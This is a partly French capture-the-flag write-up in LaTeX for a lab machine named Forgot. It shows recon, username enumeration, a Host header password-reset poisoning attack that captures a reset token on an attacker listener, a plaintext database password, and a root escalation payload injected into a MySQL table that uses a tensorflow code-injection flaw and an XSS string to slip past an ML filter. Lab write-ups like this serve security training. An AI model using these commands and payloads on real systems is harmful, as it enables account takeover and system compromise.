\chapter{Forgot}
\begin{itemize}
    \item {\bf technics}: HTTP Host header vulnerabilities,
    \item {\bf Components}: 
    \item {\bf tools}: 
\end{itemize}


\section{Résumé}


\section{Details}

\subsection{Recon}
\subsubsection{nmap}
\begin{verbatim}
TARGET_IP=10.10.11.188
$ PORTS=$( sudo nmap --min-rate=1000 -T4 -p- $TARGET_IP | grep '^[0-9]' | 
    cut -d'/' -f 1 | tr '\n' ',' | sed s/',$'//)
$ echo $PORTS
$ sudo nmap -sVC -p$PORTS $TARGET_IP
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open  http    Werkzeug/2.1.2 Python/3.8.10
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 NOT FOUND
|     Server: Werkzeug/2.1.2 Python/3.8.10
|     Date: Fri, 09 Dec 2022 12:19:00 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 207
|     X-Varnish: 32775
|     Age: 0
|     Via: 1.1 varnish (Varnish/6.2)
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest:
|     HTTP/1.1 302 FOUND
|     Server: Werkzeug/2.1.2 Python/3.8.10
|     Date: Fri, 09 Dec 2022 12:18:54 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 219
|     Location: http://127.0.0.1
|     X-Varnish: 8
|     Age: 0
|     Via: 1.1 varnish (Varnish/6.2)
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>Redirecting...</title>
|     <h1>Redirecting...</h1>
|     <p>You should be redirected automatically to the target URL: <a href="http://127.0.0.1">http://127.0.0.1</a>. If not, click the link.
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.1.2 Python/3.8.10
|     Date: Fri, 09 Dec 2022 12:18:54 GMT
|     Content-Type: text/html; charset=utf-8
|     Allow: HEAD, GET, OPTIONS
|     Content-Length: 0
|     X-Varnish: 32771
|     Age: 0
|     Via: 1.1 varnish (Varnish/6.2)
|     Accept-Ranges: bytes
|     Connection: close
|   RTSPRequest, SIPOptions:
|_    HTTP/1.1 400 Bad Request
|_http-server-header: Werkzeug/2.1.2 Python/3.8.10
|_http-title: Login
\end{verbatim}

\subsubsection{http}

\begin{verbatim}
$ ffuf -u http://10.10.11.188/FUZZ -w common.txt -e .py,.html

home                    [Status: 302, Size: 189, Words: 18, Lines: 6, Duration: 350ms]
forgot                  [Status: 200, Size: 5227, Words: 766, Lines: 253, Duration: 7626ms]
login                   [Status: 200, Size: 5189, Words: 762, Lines: 246, Duration: 216ms]
tickets                 [Status: 302, Size: 189, Words: 18, Lines: 6, Duration: 155ms]

$ ffuf -u http://10.10.11.188/FUZZ -w directory-list-2.3-medium.txt -e .py,.html
home                    [Status: 302, Size: 189, Words: 18, Lines: 6, Duration: 28ms]
login                   [Status: 200, Size: 5189, Words: 762, Lines: 246, Duration: 27ms]
forgot                  [Status: 200, Size: 5227, Words: 766, Lines: 253, Duration: 34ms]
tickets                 [Status: 302, Size: 189, Words: 18, Lines: 6, Duration: 59ms]
reset                   [Status: 200, Size: 5523, Words: 820, Lines: 261, Duration: 160ms]
\end{verbatim}

forgot offre la possibilité d'enumerer les users en retournant un 
\verb+Invalid Username+ par contre très long à repondre.

en regardant la réponse on a :
\begin{verbatim}
HTTP/1.1 200 OK
Server: Werkzeug/2.1.2 Python/3.8.10
Date: Fri, 09 Dec 2022 12:34:56 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 16
X-Varnish: 3672230
Age: 0
Via: 1.1 varnish (Varnish/6.2)
Accept-Ranges: bytes
Connection: close

Invalid Username
\end{verbatim}

donc il y a un cache \verb+varnish+
\begin{verbatim}
$ ffuf -u http://10.10.11.188/forgot?username=FUZZ -w xato-net-10-million-usernames.txt -fr 'Invalid Username' -fc 500

admin                   [Status: 200, Size: 29, Words: 5, Lines: 1, Duration: 40ms]
\end{verbatim}

l sature j'ai l'impression et des fois on a une reponse brut sans html

\begin{verbatim}
$ http://forgot.htb/forgot?username=admin

HTTP/1.1 503 Backend fetch failed
Date: Fri, 09 Dec 2022 12:52:42 GMT
Server: Varnish
Content-Type: text/html; charset=utf-8
Retry-After: 5
X-Varnish: 4300072
Age: 0
Via: 1.1 varnish (Varnish/6.2)
Content-Length: 284
Connection: close

<!DOCTYPE html>
<html>
  <head>
    <title>503 Backend fetch failed</title>
  </head>
  <body>
    <h1>Error 503 Backend fetch failed</h1>
    <p>Backend fetch failed</p>
    <h3>Guru Meditation:</h3>
    <p>XID: 4300073</p>
    <hr>
    <p>Varnish cache server</p>
  </body>
</html>
\end{verbatim}

Error 503 Backend Fetch Failed is displayed when the HTTP cache fails to fetch the requested data from the webserver.

There could be numerous reasons why it was unable to retrieve the data; the server could be down or unavailable, the connection could’ve closed before the cache server was done reading the response, the backend code or plugins could be at fault, and so on.

reset change le password si l'on a un token.

C'est un peu la merdasse. dans le code un commentaire
\verb+ <!-- Q1 release fix by robert-dev-10025 -->+

il s'agit du compte user.

sur forgot il indique renvoyer un lien de reset.
\verb+Password reset link has been sent to user inbox. Please use the link to reset your password+

\url{https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning}

\begin{verbatim}
$ curl -H "Host: 10.10.16.3" http://10.10.11.188/forgot?username=robert-dev-10025
Password reset link has been sent to user inbox. Please use the link to reset your password

$ sudo python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.188 - - [09/Dec/2022 15:22:01] code 404, message File not found
10.10.11.188 - - [09/Dec/2022 15:22:01] "GET /reset?token=AI4mQqhEa45jaP95vk9FQ67CRwSxgo0wm6qQS8qL732SCTiiY2%2FTOnJrHpw52tZNA4BeoLROY1A34fAYUBJMJA%3D%3D HTTP/1.1" 404 -

\end{verbatim}

\subsection{Foothold}
\subsubsection{x}
\begin{verbatim}
diego:dCb#1!x0%gjq


$ sudo -l
Matching Defaults entries for diego on forgot:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User diego may run the following commands on forgot:
    (ALL) NOPASSWD: /opt/security/ml_security.py

\end{verbatim}

\begin{verbatim}
$ cat /opt/security/ml_security.py


# Grab links
conn = mysql.connector.connect(host='localhost',database='app',user='diego',password='dCb#1!x0%gjq')

$ mysql -u diego --password='dCb#1!x0%gjq'
mysql>
mysql> use app
mysql> describe escalate;
+--------+------+------+-----+---------+-------+
| Field  | Type | Null | Key | Default | Extra |
+--------+------+------+-----+---------+-------+
| user   | text | YES  |     | NULL    |       |
| issue  | text | YES  |     | NULL    |       |
| link   | text | YES  |     | NULL    |       |
| reason | text | YES  |     | NULL    |       |
+--------+------+------+-----+---------+-------+
mysql> insert into escalate values ("lol","lol","lol",'hello=exec("""\nimport os\nos.system("/dev/shm/lol.sh")\nprint("&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E")""")');
\end{verbatim}

To explain it shortly:

The python script basically checks the reasons from escalate table in the
database for xss using machine learning. If they get a score higher then .5,
they get passed to \verb+preprocess_input_exprs_arg_string+ function which is
vulnerable in tensorflow < 2.6.4
\url{https://github.com/advisories/GHSA-75c9-jrh4-79mc}

Hence, all the stuff in the print function to make it pass the test.
\subsubsection{x}

\begin{verbatim}

\end{verbatim}

\begin{verbatim}

\end{verbatim}
\section{Theorie}


